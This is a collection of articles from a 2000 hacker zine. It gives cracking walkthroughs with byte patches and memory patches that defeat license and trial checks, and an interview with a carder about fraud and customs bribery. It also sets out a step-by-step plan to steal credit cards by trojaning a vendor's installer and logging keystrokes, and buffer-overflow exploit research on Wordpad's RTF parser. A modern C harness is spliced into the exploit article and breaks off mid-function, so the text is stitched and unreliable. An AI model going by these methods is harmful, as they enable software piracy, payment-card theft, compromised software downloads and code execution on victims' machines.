* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00473B38(C)
|
:00473BAC C605057A4D0001          mov byte ptr [004D7A05], 01
:00473BB3 68F4010000              push 000001F4

* Reference To: kernel32.Sleep, Ord:0000h
|
:00473BB8 E88320F9FF              Call 00405C40
:00473BBD 33C0                    xor eax, eax
:00473BBF E8D4FDF8FF              call 00403998
:00473BC4 EB07                    jmp 00473BCD

* Referenced by a (U)nconditional or (C)onditional Jump at Addresses:
|:00473B75(C), :00473B7E(C)
|
:00473BC6 33C0                    xor eax, eax
:00473BC8 A31C7A4D00              mov dword ptr [004D7A1C], eax

* Referenced by a (U)nconditional or (C)onditional Jump at Addresses:
|:00473B95(C), :00473BA3(C), :00473BC4(U)
|
:00473BCD C605187A4D0000          mov byte ptr [004D7A18], 00
:00473BD4 5B                      pop ebx
:00473BD5 C3                      ret

I listed this code in full because this is where the beauty of WinHack 2.0's magnificent protection scheme really hides. I understood this after quite a lot of time spent on debugging attempts with SoftIce.

This scheme relies on changing several addresses: 004D7A04, 004D7A05, 004D7A18, 004D7A1C, 004D79FC, from two places. And if any of the addresses is not set as it should be, the program exits. I also think that in the original these addresses are hidden from that TExeImage (this is an assumption). It's a fact that DeDe didn't list the code of two units for me, and it should have. When I checked, it turned out that in the exe the RVA addresses are not in the CODE section. But since I know what class members look like in Delphi, I easily found where the two little procedures that deal with this m.dmp begin and end. I can hardly describe the whole protection scheme of this baby in full, but something makes me think it was conceived magnificently. The beauty of the writing to these addresses and the reading of them. It's interesting that WinHack doesn't object to debugging with SoftIce, but when you get close to the basis of the reg-code calculations the baby halts. I wondered a lot about what exactly is going on. The baby also halts at every attempt to write to its memory; I found this out when I tried to make a memory patch of the shrunk original. Also interesting is that this baby is patched very easily. Only 4 bytes need to be replaced:

RVA         Phys        From    To
0047574F    00074B4F    B8C3    B0FF
00472D9C    0007219C    53      C3
00473B70    00072F70    53      C3

Here, by physical address is meant the physical address in the deshrunk file (1 038 336 bytes). Well, that's it for WinHack 2.0, guys; for that many hours (about 6 already), that much. After the above patch of the exe you can debug with SoftIce to your heart's content and enjoy the protection scheme of this baby. I wonder what the original Delphi code was. I established that Form1 has 3 Timers. Maybe something like: two of the timers set each other enabled, not allowing the third one's OnTimer to occur, setting it enabled too. And if that happens with the third one, it simply halts the program. These, of course, are again assumptions, but the asm code of these timers is close to this thesis. Well, now this really is the end. Let the code be with you!

(Solar's note: The etymology of this phrase is interesting. It originates from the film StarWars, where its original form is "Let the force be with you!". Therefore it is more correct to say "Let the source be with you!", although in cracker circles the use of source is a rarity.)

DaFixer (C) 2000 Phreedom Magazine

. . . . . . . . . .. . ... . ...............
Cracking PerlBuilder 1.0           By mr-drone
........... . . . . . . . . . . . . . .

Hmm, I don't know how to begin ... maybe with the fact that for me cracking is a fairly broad concept, but at its core it is getting around some restrictions imposed by the authors: less time, fewer functions, fewer conveniences. In the end what matters is the final result: full use of the cracked program. And how that happens, everyone has their own choice of methods :) And the more a person is on the right path, the fewer dots there are in the sentence "And then I debugged, debugged ..." :) So I don't consider this example any kind of benchmark, on the contrary, nor anything revolutionary or things of that sort; this is a lazy solution to the problem :) I suppose there will be quite a few people who will laugh at me (especially those more advanced in this art ;), but my omissions may remind you of something (I hope so :) Soo, I seem to have overdone the preface ...

The victim: Perl Builder 1.0d for Win (14-day evaluation, www.solutionsoft.com)

One day I find PerlBuilder and happily realize I'll need it. What a surprise though: apparently I had installed it some time ago, because a window appears saying "Trial Expired". Plus it has buttons "Quit", "Information" and "Try", the last of which is greyed out (disabled). "Hmm, we'll see about that", I think to myself, looking at RegMon's log.
Kazano nakratko ne mozah da go hvana dali vyobshte chete ot registri-to che sa minali kratkite 14 dni. Togava mi hrumna drugo, po-myrzelivo reshenie na problema. Prosto triabva da se natisne butona "Try" !!! Izrovih iz disk-a si edna moja programka - 'Enabler' (predpolagam che na vashia disk ja niama, taka che mozete da si ja drypnete ot http://mr-drone.hypermart.net, niakyde v 'Own code' ;) i si ja pusnah. Kato se zadyrzi desnia buton na mishkata vyrhu prozoreca na Enabler-a, toj se skriva i kursora stava na mishena. Togava chovek moze spokojno da si obhozda windowskite kontroli (comboboxes, edits, labels, BUTTONS, windows ) i da gi select-va. Az estestveno si izbrah butona "Try" i pusnah rbutton-a na mishoka. Enabler-a se pojavi pak, davajki mi slednata informacia za class-a, parent hwnd-to, i samoto hwnd: Target: "Button, p:0x2CC, h:0x2C4" Target's text: "&Try" , kakto i che izbrania kontrol e Disabled i Visible. Syvsem hladnokryvno go napravih da e 'Enabled' i minimizirah Enabler-a da vidia k'wo stava sys PerlBuilder-a. Butona "Try" beshe veche syvsem normalen i mozeshe da se clickne, muhahaha :) Mdaa, ne sled dylgo dojde i razocharovanieto - momchetata ot SolutionSoft praviat otnovo proverkata dali e izteklo vremeto :( Rezultatyt beshe edin MessageBox, kazvasht neshto ot sorta : "Your application is expired!". E, shte triabva po trudnia nachin javno :) Restart-nah mashinata, za da se zaredi SoftIce. Takaa, pusnah si pak PerlBuilder-a i povtorih nomera sys Enabler-a. Otbeliazah si toja pyt hwnd-to na button-a "Try" - "h:0x49C", t.e hwnd-to e 0x48C (genialno, nali :) Predi da natisna "Try" obache vliazoh s ctrl-d v SoftIce i slozih breakpoint pri message WM_LBUTTONUP ot hwnd 49C sys komandata 'bmsg 49c wm_lbuttonup'. Izlizajki ot SoftIce (s ctrl-d) veche biah hvyrlil mrezite i samo triabvashe da natisna zlopoluchnia buton "Try", za da breakpointna koda. Po babeshkia metod s golemi skokove pochnah da trasiram koda. 
After the 10th press of F12 the familiar message related to the expiry of the application showed up :) Right, so after the 9th time I have to be more careful. I repeated everything from the start - ran PerlBuilder again, tampered with the "Try" button using Enabler, saw its hwnd, cleared the old breakpoint (bc *) and set the new one (for the new hwnd). This time I stopped after the 9th press of F12 and continued with F10 (step by step). It turned out that the 27th press of F10 executed the very call that shows the MessageBox. I repeated everything from scratch as before, but this time I paid attention as the ill-fated CALL began to approach. That is how I got to the following code:

157:07005FAA 3B45F0      cmp eax,[ebp-10]
157:07005FAD 751A        jnz 07005FC9
157:07005FAF 6A00        push 00
157:07005FB1 8D4DE0      lea ecx,[ebp-20]
157:07005FB4 6A1A        push 1A
157:07005FB6 E8B5650100  call 07016570
157:07005FBB 6858330507  push 07053358
157:07005FC0 8D45E0      lea eax,[ebp-20]
157:07005FC3 50          push eax
157:07005FC4 E867A00300  call 07040030

Happy and cheerful, after I changed the check, PerlBuilder started ! :) I was already rubbing my hands to patch Vboxt403.dll (SoftIce exposed it as the one containing the code above), after which I found out, however, that Vboxt403.dll does not contain such a sequence of instructions! (0x3B 0x45 0xF0 0x75 0x1A) Well, here I got stuck, wondering how to unpack the dll, what it is packed with and whether it is packed at all ?!? Until I realized that it is in fact exactly as it should be ... while PerlBuilder is running :))) Heh heh, I needed a little time to write myself a read/write process memory tool, and since I knew the virtual address at which the dll is loaded (that is, I only needed the address of the code above) I could crack it in memory :) Actually, I don't think it is 100% certain that Vboxt403.dll will load at exactly the same address, but that could probably happen only in some extreme case.
Here, by 'cracking in memory' I actually meant the following actions - I ran PerlBuilder, enabled the "Try" button, ran Ps.exe (also available at mr-drone.hypermart.net) and selected the PerlBuilder process. Just in case, I read the value at address 7005FAD and, having made sure that it is 0x75 (i.e. no mistake), wrote 0x74 at the same address :)) Then all that remained was to press "Try" ...

mr-drone (C) 2000 Phreedom Magazine

. . . . . . . . . .. . ... . ...............
Interview with a BG carder
By EXo
........... . . . . . . . . . . . . . .

The interview format is somewhat untraditional for Phreedom Magazine, but it turned out to be quite useful in this case... Some time ago on IRC I came across a person who, to my great surprise, turned out to be one of the older carders and definitely had something to tell. After a short chat and an unsuccessful attempt at an article on his part, we agreed to do a short interview. I cannot guarantee 100% authenticity of the things written below... but after reading the piece you will be able to judge for yourselves. The guy, naturally, preferred to remain anonymous.

<Anonymous> Shall we start?
<|EXo|> Yes, but keep in mind that this "interview" (take it more as a chat or simply a dialogue) does not aim to make you out to be a superhero, to flatter you and so on ... its purpose is informational, I will try to ask a minimal number of personal questions, some of the things I am writing (even now) will be published, some of them - not...
. . .
<|EXo|> Why did you agree to this interview... people who do carding (or at least those who have some self-respect) rarely talk about the "tricks" of the trade?
<Anonymous> I have no intention whatsoever of commenting on specific facts or circumstances that I or anyone else went through in order to get to possible financial gains
<|EXo|> How many people in BG, in your opinion, can claim that they know everything about carding without that being empty words?
<Anonymous> a few guys from Varna, one lost soul from Yambol and the rest are small fry
<|EXo|> Does this mean there are several distinct "groups" of carders in the country that operate independently?
<Anonymous> yes, but due to certain rather harsh circumstances it turned out that they stick together very tightly, contrary to everyone's expectations at the moment. Everyone is in some way dependent on someone else ...there is also a serious rumour about investigations already btw.
<|EXo|> I.e. anyone can rat out the others if he wishes?
<Anonymous> well you know how it is, where there is a lot of money there are many interests and no friends, everyone would cover his own back even at the expense of an acquaintance/colleague
<|EXo|> Has it happened that the orders got mixed up?
<Anonymous> if an order ends up at a Sofia address and inside there are 3 notebooks worth about $5000, 1-2 people have the duty to ask the biggest fish whose the stuff is, and in case nobody responds, accordingly, the Varna guys have taken my stuff and I theirs
<|EXo|> In the mail that became the reason for this conversation, you were outraged at the swarm of "little carders" who brag about their "laughable" orders. What is a serious order for you?
<Anonymous> a very difficult question given that 1) it may sound as if I am bragging with the answer 2) I may look ridiculous in front of some people 3) I would probably... lie to you, it is about too much money, because the common practice is much less
<|EXo|> Then, what is the most impressive order that you know of?
<Anonymous> quite a while ago I was very impressed by an order by the Varna guys with 10x Quantum 6.4Gb + 2x USRobotics EXT. 56.6 + some Diamond or other, for a total of about $2000; now things are done on a much bigger scale, otherwise it is not worth the risk and above all the time you put in, because this is intellectual fraud of the most serious kind when it is done by the "serious carders"
<|EXo|> How long ago did you make your first "big hit" and how did it happen?
<Anonymous> the first acquaintance of a provincial from Varna with a customs officer was about 3 years ago...me a little after them.
Unfortunately it is not profitable to work only with a customs officer, but that is another topic
<|EXo|> In this case, did they seek out the customs officers or did the customs officers seek them out for these mutual favours?
<Anonymous> almost always they pick you, after having observed more than once that a given address simply stands out with its orders
<|EXo|> What was the deal? How did you split ... ?
<Anonymous> initially I paid 20%. the legal import duty you have to pay is 26%, except that this duty does not apply to computer parts and applies only above a certain amount, which is concealed
<|EXo|> How long did you go on like that?
<Anonymous> very briefly, because those guys are very greedy and several people started offering their services ...until finally one of them shone :) with the best offer...
<|EXo|> Was there pressure from their side? Extortion or something like that?
<Anonymous> no, I even screwed them over on the money very often, for example: I have an order for $1000. according to the deal I owe 10-15%, I give 170 lv and say: "there's no more, "buddy""
<|EXo|> Are you proud of that now?
<Anonymous> in my opinion this is entirely a matter of upbringing, I have brought myself up since I was very small => a solid amount of money from non-physical work. That I have the intellect to do it, in my opinion there is nothing strange in that
<|EXo|> Were there moments when you competed over who would order the most?
<Anonymous> well no, it is like competition between grown-ups, he who does not work will not eat
<|EXo|> Until when do you intend to continue with the orders?
<Anonymous> until I move out of Bulgaria, which I hope will happen very soon, I want to start over there, but as a computer specialist and not as a wise guy and a hustler
<|EXo|> Have you ever had problems with the cops...and are you afraid at all?
<Anonymous> I personally haven't, but an acquaintance had super serious problems. Honestly, "I couldn't care less", although people have been burned and recently I learned of a colleague who got beaten up and had his money and goods taken.
On the whole there is still no law that punishes this kind of financial gain, which in my opinion is pure intellectual fraud
<|EXo|> Who placed the orders? Did you decide yourself what you would get "this time" or was there a ready list of goods?
<Anonymous> for an order to be worth it, i.e. to be big, a lot of fraudulent potential goes into the contact with the sales manager of the shop that ships the goods; SDRAM, CPU or a notebook sell best, because the first 2 come with a 7-day warranty, they are terribly small, i.e. a lot of them fit into one order
<|EXo|> Are you worried that with this interview you might harm some "colleague" and that he might not like it?
<Anonymous> hardly, 1) I am anonymous 2) who cares what I say 3) I haven't cited specific blunders, deeds etc. of colleagues, and besides I personally don't give a damn about anyone or anything. This isn't my only source of bread, and at most someone will be annoyed that he didn't get to show off with a bit of publicity, as the Varna guys have the habit of doing in various commercial magazines (Egoist'12.1999)
<|EXo|> Actually, what do you think about VHG? What are your relations with them?
<Anonymous> well that is a very sore topic. From VHG I know one person personally, who is devilishly capable, and from IRC I know a 2nd one who for me is the most talented hacker in Bulgaria, not by chance a member of !ADM. By VHG I mean xdm, CuMeoHoB, Maniac, schMATKA and I think even Rumen. let's say that on this question, for certain reasons, I won't go into detail, but part of VHG I don't know, and others I see often :)
<|EXo|> How did the problem come about that blew up in the newspapers a few years ago?
<Anonymous> well about that I have information from an awful lot of sources. It is a fact, however, that in that affair, for which the Varna guys took the heat, the poor things had no part in the blame
<|EXo|> Did someone wash their hands of it? How high up does the whole affair go?
<Anonymous> I heard there are even politicians mixed up in it /for the most clueless - we are talking about the affair with the car/
<|EXo|> After reading this conversation, many "wise guys and hustlers" will surely rush to place orders, and the more brazen ones may try to get in touch with the "good people" at customs too. What would you tell them, as a person who is already inside the game?
<Anonymous> you're late, guys! hide somewhere, because there should already be sanctions coming, and they won't be borne by the Varna guys or me, but by someone whose neck isn't that thick yet
<|EXo|> Do you know of any female carder? :)
<Anonymous> serious ones - I guarantee there are none. For the odd bra from viktoriasecrets.com (or whatever it was) + "fishing Efnet all the day" - a girl might really manage too :)

EXo (C) 2000 Phreedom Magazine

. . . . . . . . . .. . ... . ...............
Solar Eclipse's Guide To Stealing 100000 Credit Cards in 21 Days
........... . . . . . . . . . . . . . .

Day 1. Find a victim.
There are lots of companies offering direct download of their software. Some of them have a HUGE user base. A site with shareware will be better, because more people will download the files. ICQ will be one of the best victims - they have a lot of downloads every day and their software will be downloaded mostly by clueless users.

Day 2. Do some security research.
Most big software companies have fairly good protection for their development servers. But their weak point is the web servers. Often the system administrators think that isolating the web server from the rest of the internal network (aka Intranet) will be good for the overall site security. Sometimes they leave the web server less protected than the rest of their network. Breaking into the web server is much easier than breaking into the development servers. Fortunately for the hackers, everything they need is on the web server.

Day 3. r00t the web server. Clean the logs, install a backdoor, have fun.

Day 4. Download the latest ICQ version from the web server. You will attach your trojan code to it.

Day 5. Write your trojan code and attach it to the executable ICQ file. You might want to use some InstallShield unpacker to get the ICQ.EXE file, infect it and then put it back into the packed SETUP.EXE. You don't need the source code of ICQ to put a trojan in it. There are many ways to add executable code to existing binary files. Viruses have been doing this for years.

Day 6. Upload the infected ICQ setup file to the server, replacing the old one. Questions to the sysadmins: How many of you are running Tripwire on your web server files?

Day 7. Wait.

Day 8. Check your email account and see how many new CCs you've got. (I assume that you are using email for getting the CCs back to you. More advanced ways to do this exist, but I'll keep it simple and stupid.)

Day 9 - Day 20. Buy stuff.

Day 21. Get busted and spend the rest of your life giving pleasure to big sweaty inmates. But hey, you might like it!

Appendix A. Where are the CCs stored?
There are 3 different approaches to getting the CCs from the user's computer. You can try scanning the whole hard drive for strings that look like credit card numbers. There is a simple algorithm for checking if a given string of digits is a credit card or not. Consult your favorite CCgen program. This way is slow and the chances of success are not very high. You can also try putting the user's network card in promiscuous mode, or capture the outgoing data from his modem. Unfortunately (or fortunately, depending on your point of view) almost everybody uses SSL nowadays and the number of unencrypted CCs floating around is not very high. The third way is to target a specific application. A good example is Microsoft Wallet. You might need to deal with the encryption of the stored CC data - it's not impossible, but quite hard. Btw, think about Internet Explorer. The vast majority of Windows users use IE for online shopping.
Somewhere in MSIE there is a function that takes some parameters as its input and combines them into a URI encoded string, just like the thing that you see in your browser's location field after submitting a GET form. This function is called every time you submit a form and its parameters are the names and the values of the form input fields. A logical approach for the browser designers is to use this function for every form (both SSL and non-SSL) and to encrypt the data in the transport layer, just before passing them to the Winsock. If you know exactly where this function is located, you might be able to patch the DLL and make it pass the _unencrypted_ contents of every submitted form to you. It is possible to find this function through a lot of debugging and disassembling of MSIE. Unfortunately, you will need to do the same with every version of MSIE, because the exact address of the code changes. Probably the best approach is to do keyboard capture. Relatively few people use software like Microsoft Wallet. Most of them enter their CC number every time they buy something online. This is not only the most successful method, but also the simplest. Good luck and don't get caught!

Solar Eclipse (C) 2000 Phreedom Magazine

. . . . . . . . . .. . ... . ...............
Microsoft Wordpad Buffer Overflow Research
By Solar Eclipse
........... . . . . . . . . . . . . . .

I. Introduction

The first report was from Pauli Ojanpera <pauli_ojanpera@HOTMAIL.COM>

    Win98/NT4 Riched20.dll (which WordPad uses) has a classic buffer overflow problem with ".rtf"-files.

    Crashme.rtf :
    {\rtf\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}

    A malicious document may probably abuse this to execute arbitrary code. WordPad crashes with EIP=41414141.

Thomas Dullien <dullien@GMX.DE> did very good research on this buffer overflow. Unfortunately I received his vuln-dev post after I was deep into the Wordpad code, so I had already discovered most of the details that he posted.

II. Research

Ok, let's try to exploit this shit. First, try to crash Wordpad. Create the following file:

{\rtf\AAAAAAAAAA(100 'A's)}

I am using SoftIce to inspect the situation after the crash. First, take a look at the registers and the stack.

EIP=61616161 ESP=0012F044 EBP=61616161

                                ebp      eip
0023:0012F024 0012F104 00000102 61616161 61616161 ........aaaaaaaa
0023:0012F034 0000001B 00000246 0012F044 00000023 ....F...D...#...
0023:0012F044 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F054 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F064 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F074 61616161 61616161 00000000 00000000 aaaaaaaa........

We can assume that EBP and EIP were popped from the stack and then RET 10 was executed, decreasing the stack pointer. To check if this is the case, try the following:

{\rtf\AAAABBBBCCCCDDDDEEEEFFFF(...to ZZZZ)}

Wordpad crashes again. The registers and the stack are as follows:

ESP=0012F054 EBP=6A6A6A6A 'jjjj' EIP=6B6B6B6B 'kkkk'

                                ebp      eip
0023:0012F034 0012F114 00000102 6a6a6a6a 6b6b6b6b ........jjjjkkkk
0023:0012F044 0000001B 00000246 0012F054 00000023 ....F...D...#...
0023:0012F054 6C6C6C6C 6D6D6D6D 6E6E6E6E 6F6F6F6F llllmmmmnnnnoooo
0023:0012F064 70707070 71717171 72727272 73737373 ppppqqqqrrrrssss
0023:0012F074 74747474 75757575 76767676 77777777 ttttuuuuvvvvwwww
0023:0012F084 78787878 79797979 7A7A7A7A 00000200 xxxxyyyyzzzz....

Yes, our assumption was correct. EBP gets its value from 0012F03C, and the RET 10 instruction gets the EIP from 0012F040. The buffer is probably 36 characters big, because 'jjjj' overwrites it. By the way, notice that the characters are lowercased. This means that the buffer is lowercased before the crash. Let's try the following file (36 characters):

{\rtf\AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII}

It shouldn't crash, but it does. This is strange.
Take a look at the registers and the stack: (btw, do a quick check with 35 characters - Wordpad will not crash)

EIP=002E0033 ESP=0012F108 EBP=00200067

0023:0012F0E8 0012F294 6E002F02 00200067 002E0033 ...../.ng. .3...
0023:0012F0F8 0000001B 00000202 0012F108 00000023 ............#...
0023:0012F108 0020002E 006C0070 00610065 00650073 .. .p.l.e.a.s.e.
0023:0012F118 00770020 00690061 00000074 00000000 .w.a.i.t.......
0023:0012F128 00000000 00000000 0000002E 00000000 ................
0023:0012F138 0012F194 5F816876 00000014 00000000 ....vh._........
0023:0012F148 00000000 00000001 029AE0CD 00000064 ............d...
0023:0012F158 0012F1B8 0012F68C 0012F638 5F816850 ........8...Ph._
0023:0012F168 00C14812 00000000 0012F2A4 00000168 .H..........h...
0023:0012F178 0012F292 0012F290 00C15810 0012F1A8 .........X......
0023:0012F188 00C15B3A 00000007 00000006 0012F1CC :[..............
0023:0012F198 6C026878 0012F294 0012F290 00C11DC8 xh.l............
0023:0012F1A8 61616161 62626262 63636363 64646464 aaaabbbbccccdddd
0023:0012F1B8 65656565 66666666 67676767 68686868 eeeeffffgggghhhh
0023:0012F1C8 7D696969 0012F1E0 6C026B81 0012F290 iii}.....k.l....

This is even more strange. The EBP and EIP are not overwritten by our string, but they are still smashed. It's time to try to find where exactly the code guilty for this mess is. Notice that the EIP is overwritten and we don't know what code was executed before the crash. Pauli Ojanpera posted that the crash was in riched20.dll. Check the loaded DLLs: there is no riched20.dll, but we see riched32.dll. This sounds good! At what address is this DLL loaded?

:map32 riched32
Owner     Obj Name  Obj#  Address        Size      Type
RICHED32  .text     0001  001B:6C001000  00027284  CODE RO

The code is loaded at 6C001000. Where is the buffer overflow? It is probably located in some function in RICHED32.DLL. This function is probably called from some other function, which is also called from somewhere.
We should be able to see the return addresses for these previous calls on the stack. Let's search for something that looks like a return address. At 0012F1D0 we see the bytes 6C026B81. This looks like an address in RICHED32.DLL, doesn't it? Go disassemble the bastard! It is part of a function, starting at 6C026B0B and ending at 6C026B68 (I have included some more code in the middle, more about it later):

001B:6C026B0B push ebp
001B:6C026B0C mov ebp, esp
001B:6C026B0E sub esp, 04
...
001B:6C026B7A mov ecx, esi
001B:6C026B7C call 6C0267D1        ; this is called for each \ tag
001B:6C026B81 mov [edi], eax
...
001B:6C026B64 pop edi
001B:6C026B65 pop esi
001B:6C026B66 mov esp, ebp
001B:6C026B68 ret

Put a breakpoint at the beginning of this function and see what happens. The 6C026B0B function is called 2 times and crashes the second time. Trace it step by step, stepping over the calls. The function crashes after the final RET instruction (located at 6C026B68). Just before the crash the stack looks like this:

              edi      esi      local_var old_ebp
0023:0012F1D4 0012F290 00C13D58 5CC15A30 0012F40C
0023:0012F1E4 6C024DE0 <- ret address

The POP EDI and POP ESI instructions restore these two registers (look at the disassembly). Then the function restores the ESP (which is saved in EBP at the beginning of the function). By trying this with a normal RTF file (not causing a buffer overflow), we see that ESP becomes 0012F1E0. Then EBP is popped from the stack (it becomes 0012F40C) and the RET instruction returns the execution flow to 6C024DE0. This is not the case with a fucked up RTF file. Everything is ok until we hit the MOV ESP, EBP instruction. The value in the EBP register is not correct, thus fucking up the ESP and causing a mess. Ok, now we need to find where in the 6C026B0B function the EBP is smashed. Put a breakpoint at the beginning of the function and trace it (without stepping into the calls). The EBP at the beginning of the function is 0012F1E0.
It changes after the CALL 6C0267D1 instruction. Now we have the function that changes the EBP.

001B:6C0267D1 push ebp
001B:6C0267D2 mov ebp, esp
001B:6C0267D4 sub esp, 24
...

The stack of this function looks like this:

0023:0012F1A8 61616161 62626262 63636363 64646464 aaaabbbbccccdddd
0023:0012F1B8 65656565 66666666 67676767 68686868 eeeeffffgggghhhh
0023:0012F1C8 7D696969 0012F1E0 6C026B81 0012F290 iii}.....k.l....
                       ebp      eip

At 0012F1D4 we have the return address. The EBP is saved at 0012F1D0 and then the stack pointer is decremented by 36, leaving space for 36 bytes of local variables. Remember this number? This is our buffer! After some more tracing, we see that the saved ebp is changed because of

001B:6C0268E9 mov byte ptr [ebx], 00

executed right after the buffer is filled with our characters. This is a NULL termination of the string, which changes the saved ebp from 0012F1D0 to 0012F100. Let's do some more reverse engineering. From 6C0268AE to 6C0268DB we have a loop that reads our string and copies it into the buffer.

001B:6C0268AE mov al, [ecx]                        ; get the current char
001B:6C0268B0 inc ecx                              ; ecx points to the next char
001B:6C0268B1 mov [ebp-01], al                     ; store the current char at 0012F1C8
001B:6C0268B4 mov [esi+1C], ecx                    ; store ecx at 0012F2AC
001B:6C0268B7 mov eax, 00000001                    ; what the fuck?
001B:6C0268BC test eax, eax
001B:6C0268BE jc 6C0268E9                          ; this is never executed
001B:6C0268C0 movzx eax, byte ptr [ebp-01]         ; get the current char
001B:6C0268C4 test byte ptr [eax+6C00C6B8], 01     ; is it 'A'-'Z' or 'a'-'z' ?
001B:6C0268CB jz 6C0268E9                          ; no -> go there
001B:6C0268CD mov al, [ebp-01]                     ; get the current char
001B:6C0268D0 or al, 20                            ; make it lowercase
001B:6C0268D2 mov [ebx], al                        ; store it in the buffer
001B:6C0268D4 inc ebx
001B:6C0268D5 mov ecx, [esi+1c]                    ; restore ecx
001B:6C0268D8 cmp [esi+18], ecx                    ; reached the end of the string?
001B:6C0268DB jnz 6C0268AE                         ; no -> loop again

ECX is a pointer to the memory location where the RTF file is loaded.
It points to the character that we are currently copying. EBX points to the buffer. The buffer starts at 0012F1A8. By the way, notice that the current character is stored at 0012F1C8 (the third line in the disassembly). This means that our buffer is only 32 bytes long, and we have another local variable after it. This doesn't really matter, because the copying process works even if we overwrite this variable (it gets restored). If we put some shellcode there, we need to know that this particular byte will be changed to the first character after the end of the string. In our case, this is '}'.

Notice the "test byte ptr [eax+6C00C6B8], 01" instruction. At this memory location (6C00C6B8) we have an array of bytes, corresponding to each ASCII value. The array at 6C00C6B8:

+00 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+10 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+20 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+30 06 06 06 06 06 06 06 06-06 06 00 00 00 00 00 00
+40 00 05 05 05 05 05 05 01-01 01 01 01 01 01 01 01
+50 01 01 01 01 01 01 01 01-01 01 01 00 00 00 00 00
+60 00 05 05 05 05 05 05 01-01 01 01 01 01 01 01 01
+70 01 01 01 01 01 01 01 01-01 01 01 00 00 00 00 00
+80 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+90 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+A0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+B0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+C0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+D0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00

The only ASCII characters that will pass the JZ condition after the TEST instruction are the letters 'A'-'Z' and 'a'-'z' (ASCII values 41-5A and 61-7A). If any other character is reached, the copying is ended and the buffer is NULL terminated. Next we try really taking over the return address.
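The copy loop and frame layout just described, modelled in C as an added example (not code from the article or from riched32): the unbounded copy runs inside a constructed byte-array frame seeded with the saved EBP and return address from the dump above, so the 35-, 36- and 44-letter control words can be compared without a debugger, and a bounded copy beside it shows the length check the DLL lacks. The frame array, its slack after the return address and all helper names are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Constructed model of the riched32 frame described above: 32-byte keyword
 * buffer at ebp-0x24, the "current character" local at ebp-01, then the
 * saved EBP and the return address.  Offsets come from the article; the
 * byte-array layout and the slack after the return address are ours. */
enum { KW_BUF_SIZE = 32, OFF_CUR_CHAR = 35, OFF_SAVED_EBP = 36,
       OFF_RET_ADDR = 40, FRAME_SIZE = 64 };

/* Same test as "test byte ptr [eax+6C00C6B8],01": only letters pass. */
static int is_rtf_letter(unsigned char c) {
    return (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z');
}

/* The disassembled loop as it behaves: copy letters into the buffer at the
 * start of the frame, lowercase with OR 0x20, stop at the first non-letter
 * or at the end of input, then NUL-terminate.  Nothing compares against
 * KW_BUF_SIZE, so a long control word runs over the locals, the saved EBP
 * and the return address.  Returns bytes written, NUL included. */
static size_t copy_keyword_unsafe(unsigned char *frame, const char *src,
                                  const char *end) {
    unsigned char *dst = frame;          /* ebx */
    const char *p = src;                 /* ecx */
    while (p != end) {
        unsigned char c = (unsigned char)*p++;
        frame[OFF_CUR_CHAR] = c;         /* mov [ebp-01],al, before the test */
        if (!is_rtf_letter(c)) break;    /* jz 6C0268E9 */
        *dst++ = c | 0x20;               /* or al,20 ; mov [ebx],al ; inc ebx */
    }
    *dst = 0;                            /* mov byte ptr [ebx],00 */
    return (size_t)(dst - frame) + 1;
}

/* Hardened variant: the destination size is a parameter and the copy never
 * runs past it; an over-long control word is rejected (-1, dst emptied)
 * instead of silently corrupting the frame.  Returns 0 on success. */
static int copy_keyword_safe(char *dst, size_t cap, const char *src,
                             const char *end) {
    size_t n = 0;
    if (cap == 0) return -1;
    for (; src != end && is_rtf_letter((unsigned char)*src); src++) {
        if (n == cap - 1) { dst[0] = '\0'; return -1; }  /* no room for letter + NUL */
        dst[n++] = (char)(*src | 0x20);
    }
    dst[n] = '\0';
    return 0;
}

/* Little-endian helpers so the demo reads the frame the way x86 would. */
static uint32_t get_le32(const unsigned char *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void put_le32(unsigned char *p, uint32_t v) {
    for (int i = 0; i < 4; i++) p[i] = (unsigned char)(v >> (8 * i));
}

typedef struct {
    size_t        bytes_written;  /* letters copied plus the NUL */
    uint32_t      saved_ebp;      /* what the caller's EBP is restored to */
    uint32_t      ret_addr;       /* what RET will jump to */
    unsigned char cur_char;       /* what is left in [ebp-01] */
} frame_state;

/* Parse the last control word of `rtf` with the unsafe loop inside a frame
 * pre-loaded with the saved EBP / return address from the article's dump. */
static frame_state simulate_control_word(const char *rtf) {
    unsigned char frame[FRAME_SIZE] = {0};
    frame_state st = {0, 0, 0, 0};
    const char *kw = strrchr(rtf, '\\'), *end = rtf + strlen(rtf);
    size_t letters = 0;
    put_le32(frame + OFF_SAVED_EBP, 0x0012F1E0u);
    put_le32(frame + OFF_RET_ADDR, 0x6C026B81u);
    if (kw == NULL) return st;
    kw++;
    /* Harness guard only: the real code has no such check, but the demo must
     * not write outside its own array. */
    while (kw + letters < end && is_rtf_letter((unsigned char)kw[letters])) letters++;
    if (letters + 1 > FRAME_SIZE) return st;
    st.bytes_written = copy_keyword_unsafe(frame, kw, end);
    st.saved_ebp = get_le32(frame + OFF_SAVED_EBP);
    st.ret_addr  = get_le32(frame + OFF_RET_ADDR);
    st.cur_char  = frame[OFF_CUR_CHAR];
    return st;
}

/* 1 if the hardened copy accepts the last control word of `rtf` and yields
 * `expected`; 0 if it rejects the word or the result differs. */
static int safe_copy_matches(const char *rtf, const char *expected) {
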